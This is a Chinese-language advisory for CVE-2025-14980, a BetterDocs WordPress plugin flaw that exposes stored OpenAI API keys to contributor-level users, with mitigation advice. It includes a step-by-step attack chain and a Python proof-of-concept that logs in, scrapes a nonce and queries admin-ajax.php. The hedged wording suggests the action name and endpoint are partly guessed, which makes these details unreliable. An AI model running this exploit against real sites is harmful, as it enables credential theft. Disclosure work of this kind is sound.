CVE-2025-14980 BetterDocs WordPress插件敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-14980

漏洞类型

敏感信息泄露

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

BetterDocs WordPress Plugin

漏洞概述

BetterDocs是WordPress平台上一款流行的文档管理插件，专注于帮助用户创建美观的知识库和文档中心。该插件在4.3.3及之前所有版本中存在严重的安全漏洞，攻击者可通过scripts()函数获取存储在插件设置中的敏感配置信息，包括OpenAI API密钥等凭据。由于该漏洞需要认证才能利用，攻击者需要拥有WordPress网站的贡献者(Contributor)级别或更高权限账户，但这仍然构成重大安全风险，因为任何低权限账户都可能利用此漏洞窃取管理员配置的高价值凭据。OpenAI API密钥的泄露可能导致攻击者以受害者身份消耗API配额，产生巨额费用，或访问与该API关联的其他服务。此漏洞由Wordfence安全团队发现并报告，CVSS评分6.5，属于中等严重级别，主要影响机密性。

技术细节

该漏洞属于敏感信息泄露类型，根源在于BetterDocs插件的scripts()函数未能正确实施访问控制机制。在WordPress插件架构中，scripts()函数通常用于加载前端资源如JavaScript和CSS文件。然而，该函数的实现存在缺陷，允许经过身份验证的用户（包括贡献者级别的低权限用户）通过特定的API调用或直接请求触发该函数，从而绕过正常的权限检查逻辑。一旦函数被执行，攻击者可以获取存储在WordPress数据库wp_options表中的插件配置数据，这些数据包括API密钥、第三方服务凭据等敏感信息。攻击者需要构造特定的HTTP请求，可能通过wp-admin/admin-ajax.php端点或插件提供的REST API端点发送请求。由于WordPress的AJAX处理机制和插件注册的处理函数之间缺乏充分的权限验证，导致即使是非管理员账户也能触发相关功能。修复方案在版本4.3.4中实施，主要是对scripts()函数添加了current_user_can()权限检查，确保只有具有manage_options权限的管理员才能访问敏感配置数据。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站是否运行WordPress及BetterDocs插件，通过查看页面源码或使用wappalyzer等工具确认插件版本

STEP 2

Account Acquisition

攻击者获取目标WordPress站点的账户访问权限，至少需要贡献者(Contributor)级别权限，可通过社会工程、凭证填充或利用其他漏洞获取

STEP 3

Nonce Extraction

登录后访问BetterDocs设置页面，从页面源代码中提取WordPress安全nonce值，用于绕过CSRF保护

STEP 4

Malicious Request Construction

构造针对wp-admin/admin-ajax.php的AJAX请求，指定action参数为betterdocs_get_settings或类似触发scripts()函数的参数

STEP 5

Data Exfiltration

发送恶意请求后，scripts()函数返回包含插件配置的JSON响应，攻击者从中提取OpenAI API密钥等敏感信息

STEP 6

Credential Abuse

利用窃取的OpenAI API密钥，以受害者身份调用OpenAI API服务，消耗配额产生费用或访问关联资源

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from bs4 import BeautifulSoup

# CVE-2025-14980 PoC - BetterDocs Plugin Sensitive Information Exposure
# Authenticated attackers with contributor-level access can extract OpenAI API keys

TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site.com"
USERNAME = "contributor"  # Low-privilege account
PASSWORD = "password"

def get_nonce(sess, url):
    """Extract WordPress nonce for authenticated requests"""
    resp = sess.get(f"{url}/wp-admin/admin.php?page=betterdocs-settings")
    soup = BeautifulSoup(resp.text, 'html.parser')
    nonce_elem = soup.find('input', {'id': '_wpnonce'})
    if nonce_elem:
        return nonce_elem.get('value')
    return None

def exploit():
    """Exploit the scripts() function to extract sensitive data"""
    sess = requests.Session()
    
    # Step 1: Authenticate with WordPress
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': '/wp-admin/',
        'testcookie': '1'
    }
    sess.post(f"{TARGET_URL}/wp-login.php", data=login_data)
    
    # Step 2: Get nonce for the request
    nonce = get_nonce(sess, TARGET_URL)
    if not nonce:
        print("[-] Failed to obtain nonce")
        return
    
    # Step 3: Trigger scripts() function to leak settings
    # This exploits the unprotected endpoint in BetterDocs < 4.3.4
    exploit_data = {
        'action': 'betterdocs_get_settings',
        '_wpnonce': nonce
    }
    
    response = sess.post(
        f"{TARGET_URL}/wp-admin/admin-ajax.php",
        data=exploit_data
    )
    
    # Step 4: Parse response for sensitive data
    if response.status_code == 200:
        data = response.json()
        if 'openai_api_key' in str(data):
            print("[+] OpenAI API Key leaked!")
            print(response.text)
        else:
            print("[-] No sensitive data in response")
    else:
        print(f"[-] Request failed with status: {response.status_code}")

if __name__ == "__main__":
    print("[*] CVE-2025-14980 BetterDocs Sensitive Info Exposure PoC")
    exploit()

影响范围

BetterDocs WordPress Plugin < 4.3.4 (所有版本至4.3.3)

防御指南

临时缓解措施

作为紧急临时措施，应立即禁用或删除BetterDocs插件（如果暂不需要），或者通过.htaccess或Nginx配置限制wp-admin/admin-ajax.php的访问来源，仅允许受信任的IP地址访问管理端点。同时应立即更改所有通过该插件配置的第三方API密钥（包括OpenAI API密钥），并在可能的情况下启用WordPress的双因素认证机制。对于无法立即升级的生产环境，建议通过WordPress插件API添加临时权限检查，或使用自定义代码强制要求管理权限才能访问相关端点。